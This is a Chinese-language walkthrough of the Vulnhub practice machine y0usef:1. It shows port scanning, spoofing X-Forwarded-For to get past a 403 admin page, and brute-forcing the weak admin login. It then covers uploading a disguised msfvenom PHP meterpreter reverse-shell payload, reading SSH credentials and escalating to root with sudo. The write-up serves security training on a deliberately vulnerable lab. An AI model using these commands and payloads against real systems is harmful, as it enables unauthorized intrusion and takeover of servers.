Vulnhub篇 y0usef:1

admin 2021年2月5日10:00:50评论223 views字数 1163阅读3分52秒阅读模式

点击蓝字

关注我们

0x00

靶机信息

靶机:y0usef:1

难度:简单

下载:https://www.vulnhub.com/entry/y0usef-1,624/

0x01

靶机信息

使用arp-scan工具扫描当前网段,寻找目标靶机IP
arp-scan-l
Vulnhub篇 y0usef:1

Nmap扫描端口

nmap-p 1-65535 192.168.5.217
Vulnhub篇 y0usef:1

只开放了22,80端口

然而Dirb扫描不到目录的可能字典原因

使用Dirbsearch扫描目录

Python3 dirsearch.py -u http://192.168.5.217 -e php
Vulnhub篇 y0usef:1

发现3个页面,后面两个访问页面都一样,访问adminstration页面时出现你没有访问文件权限扫描时403响应应该资源是存在需要特定条件才能访问到

Vulnhub篇 y0usef:1

尝试在请求头加个请求IP绕过启动Burp Suite抓包进行改请求头为本地地址访问

x-forwarede-for: 127.0.0.1
Vulnhub篇 y0usef:1

点击发送后果然显示出登录页面了

Vulnhub篇 y0usef:1

由于只开放了两个端口没什么可以利用的信息只能爆破账号密码

Vulnhub篇 y0usef:1
Vulnhub篇 y0usef:1

爆破使用弱口令top100字典即可开始结果账号密码全都时admin惊呼

Vulnhub篇 y0usef:1

然后直接输入账号密码登录记得请求头加伪造本地IP地址,登录成功后会发现有个上传文件地方

Vulnhub篇 y0usef:1

0x02

漏洞利用

使用msfvenom生成一个php木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=攻击机IP LPORT=连接端口 -f raw >shell.php
Vulnhub篇 y0usef:1

用msfvenom生成php木马记得去除生成木马前面注释符

Vulnhub篇 y0usef:1

然后将木马文件伪装成图片然后上传

mv shell.phpshell.png
Vulnhub篇 y0usef:1

上传完成回显了路径

Vulnhub篇 y0usef:1

上传成功后启动msfconsole进入监听模块加载生成木马的payload然后设置生成马的攻击机IP以及监听端口开启攻击

Vulnhub篇 y0usef:1

接下来访问上传木马文件路径

Vulnhub篇 y0usef:1

msfconsloe上线然后查看权限以及反弹真实终端

python-c 'import pty;pty.spawn("/bin/bash")'
Vulnhub篇 y0usef:1

访问/home目录查看到一个user.txt文件内容是Base64加密的直接使用Burp Suite解密是一个ssh用户账号和密码

Vulnhub篇 y0usef:1
Vulnhub篇 y0usef:1

账号密码为yousef和yousef123

直接ssh输入账号密码登录但无法访问/root目录需要进行提权

ssh yousef@192.168.5.217
Vulnhub篇 y0usef:1

0x03

靶机提权

直接sudo -l一下结果直接输入的是登录用户密码就验证成功了

Vulnhub篇 y0usef:1

然后sudo su切换用户就切换到root用户直接进入root目录下查看user.txt文件提权到此结束

Vulnhub篇 y0usef:1

 往期推荐 ·


Vulnhub篇Tomato

Vulnhub篇chili

Vulnhub篇presidential:1

Vulnhub篇Photographerr:1




Vulnhub篇 y0usef:1


本文始发于微信公众号(信安小屋):Vulnhub篇 y0usef:1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年2月5日10:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub篇 y0usef:1https://cn-sec.com/archives/262450.html

发表评论

匿名网友 填写信息